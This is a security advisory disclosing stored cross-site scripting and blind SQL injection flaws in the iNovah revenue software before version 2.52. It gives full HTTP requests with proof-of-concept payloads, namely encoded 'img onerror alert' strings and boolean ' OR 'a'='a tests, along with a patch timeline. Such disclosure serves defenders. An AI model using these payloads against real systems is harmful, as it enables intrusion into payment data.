Trustwave SpiderLabs Security Advisory TWSL2016-002: Multiple Vulnerabilities in iNovah Published: 02/18/2016 Version: 1.0 Vendor: System innovators (http://systeminnovators.com) Product: iNovah Version affected: prior to 2.52 Product description: iNovah is a PCI PA-DSS validated end-to-end revenue management solution that streamlines enterprise revenue collection from multiple source systems. Finding 1: Persistent Cross-Site Scripting in multiple locations *****Credit: Christiaan Esterhuizen of Trustwave (example 1 and 2) *****Credit: Mateusz Wiƛniewski of Trustwave (example 3) iNovah does not properly validate some of the user input parameters sent in POST requests. It was possible to inject either unicode or URL encoded JavaScript to some of the parameters which was then stored on the server. Example 1: Request containing the unicode encoded POC injected using the ctl00_mainContent_consDepSectionPanel_description_clientState parameter: POST /iNovah2/Balancing/EditConsolidatedDeposit.aspx HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://a.b.c.d/iNovah2/Balancing/EditConsolidatedDeposit.aspx Cookie: ASP.NET_SessionId=czqfbq55y3ejyhnei5vtmnug Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 78555 Proxy-Connection: Keep-Alive [Snipped] ctl00_mainContent_consDepSectionPanel_referenceNumber=12121212 &ctl00_mainContent_consDepSectionPanel_description_clientState=%7C0%7C01test%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D%2C %5B%5D%5D%2C%2201test%uff1cimg+src%3dx+onerror%3dalert(1)%uff1e%22%5D&ctl00_mainContent_consDepSectionPanel_description=test& ctl00%24mainContent%24availBatchDepSectionPanel%24batchDateDropDown%24dropDown=-89 [Snipped] The code is retrieved in the GET request: GET /iNovah2/Query/BrowseAudit.aspx HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ASP.NET_SessionId=czqfbq55y3ejyhnei5vtmnug Connection: Keep-Alive Proxy-Connection: Keep-Alive HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Wed, 30 Sep 2015 13:08:02 GMT Content-Length: 424459 [...] admin-pentest1General Consolidated deposit created.

User: ***********
Deposit date: 9/30/2015
Deposit ID: 56
Bank ID: WFCC
Reference #: 12121212
Description: test
[...] Example 2: Request containing the unicode encoded POC injected using the ctl00$mainContent$exportPanel$txtDescription parameter: POST /iNovah2/Export/ExportCreate.aspx?exportId=62&mode=add HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://a.b.c.d/iNovah2/Export/ExportCreate.aspx?exportId=62&mode=add Cookie: ASP.NET_SessionId=hbzddi3zvqe1pz55mwhfwnik Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 368418 Proxy-Connection: Keep-Alive [Snipped]& ctl00%24mainContent%24exportPanel%24txtDescription=pentest%uff1cimg+src=x+onerror=alert('XSS')%uff1e&ctl00%24mainContent%24exportPanel%24UseStatus=on [Snipped] HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /iNovah2/Export/ExportResults.aspx?ExportID=63 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Wed, 23 Sep 2015 10:51:45 GMT Content-Length: 173 Object moved

Object moved to here.

The JavaScript would be reflected when following the below GET request: GET /iNovah2/Export/RunExport.aspx HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://a.b.c.d/iNovah2/Export/ExportResults.aspx Cookie: ASP.NET_SessionId=hbzddi3zvqe1pz55mwhfwnik Connection: Keep-Alive Proxy-Connection: Keep-Alive Authorization: NTLM [...] HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Wed, 23 Sep 2015 10:53:48 GMT Content-Length: 163995 [...] 00002 (XML) 00002 (XML) pentest [...] Example 3: Raw HTML tags injected into printer name: POST /inovah2/Default.aspx HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: ASP.NET_SessionId=11u4gi55t5ibvmzzljkvmzff Connection: Keep-Alive Proxy-Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Content-Length: 82 __EVENTTARGET=ctl00_localPrinterLink&__EVENTARGUMENT=A776 HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Fri, 25 Sep 2015 08:10:27 GMT Content-Length: 199405 [...] The code is then reflected on the main site: GET /inovah2/Default.aspx HTTP/1.1 Host: a.b.c.d User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Cookie: ASP.NET_SessionId=11u4gi55t5ibvmzzljkvmzff Connection: Keep-Alive Proxy-Connection: Keep-Alive HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Fri, 25 Sep 2015 08:13:48 GMT Content-Length: 198750 [...]
User: *********
Local Printer: A776
[...] Finding 2: Blind SQL Injection in FindPayments.aspx via administrative account *****Credit: Christiaan Esterhuizen of Trustwave There is a find payments functionality in the application that is available for an administrative account. It was possible to injest SQL syntax statements in one of the parameters sent to the server: "ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState". Although these are only basic examples of the injection it was possible to use the injection point to successfully extract data from the backend database. Request: POST /iNovah2/Query/FindPayments.aspx HTTP/1.1 Content-Length: 76030 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate Host: a.b.c.d Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Connection: Keep-Alive Referer: https://127.0.0.1/iNovah2/Query/FindPayments.aspx Cookie: ASP.NET_SessionId=basuntzv5x41js45tmen3e55 Content-Type: application/x-www-form-urlencoded [Snipped] ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState=%7C0%7C011234%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D %2C%5B%5D%5D%2C%22011234-9374[Inejection Point]%22%5D&ctl00_mainContent_criteriaSectionPanel_accountNumberEditor=1234& ctl00_mainContent_criteriaSectionPanel_customerNumberEditor_clientState=%7C0%7C01%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D%2C%5B%5D %5D%2C%2201%22%5D&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor= [Snipped] Example 1: Injecting a statement that would validate to "True" (' OR 'a'='a): POST /iNovah2/Query/FindPayments.aspx HTTP/1.1 Content-Length: 76030 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate Host: a.b.c.d Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Connection: Keep-Alive Referer: https://127.0.0.1/iNovah2/Query/FindPayments.aspx Cookie: ASP.NET_SessionId=basuntzv5x41js45tmen3e55 Content-Type: application/x-www-form-urlencoded [Snipped] ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState=%7C0%7C011234%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D %2C%5B%5D%5D%2C%22011234-9374'+OR+'a'='a%22%5D&ctl00_mainContent_criteriaSectionPanel_accountNumberEditor=1234& ctl00_mainContent_criteriaSectionPanel_customerNumberEditor_clientState=%7C0%7C01%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D%5D%2C%5B%7B%7D%2C%5B%5D %5D%2C%2201%22%5D&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor= [Snipped] HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Thu, 24 Sep 2015 10:30:22 GMT Content-Length: 1547776 [...]
Find Results (2,000 payments)
[...] Example 2: Injecting a statement that would validate to "False" (' OR 'a'='b): POST /iNovah2/Query/FindPayments.aspx HTTP/1.1 Content-Length: 75996 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate Host: a.b.c.d Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:38.0) Gecko/20100101 Firefox/38.0 Connection: Keep-Alive Referer: https://127.0.0.1/iNovah2/Query/FindPayments.aspx Cookie: ASP.NET_SessionId=basuntzv5x41js45tmen3e55 Content-Type: application/x-www-form-urlencoded [Snipped] ctl00_mainContent_criteriaSectionPanel_accountNumberEditor_clientState=%7C0%7C011234%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B %5D%5D%2C%5B%7B%7D%2C%5B%5D%5D%2C%22011234-9374'+OR+'a'='b%22%5D&ctl00_mainContent_criteriaSectionPanel_accountNumberEditor=1234 &ctl00_mainContent_criteriaSectionPanel_customerNumberEditor_clientState=%7C0%7C01%7C%7C%5B%5B%5B%5B%5D%5D%2C%5B%5D%2C%5B%5D %5D%2C%5B%7B%7D%2C%5B%5D%5D%2C%2201%22%5D&ctl00_mainContent_criteriaSectionPanel_customerNumberEditor= [Snipped] HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Persistent-Auth: true X-Powered-By: ASP.NET Date: Thu, 24 Sep 2015 10:36:58 GMT Content-Length: 218810 [...]
Find Results (0 payments)
[...] Remediation Steps: Apply the 2.52 update or the latest stable version of the iNovah software. Please note that Trustwave SpiderLabs have not verified this fix. Revision History: 11/19/2015 - Vulnerability disclosed 01/29/2016 - Patch released by vendor 02/18/2016 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.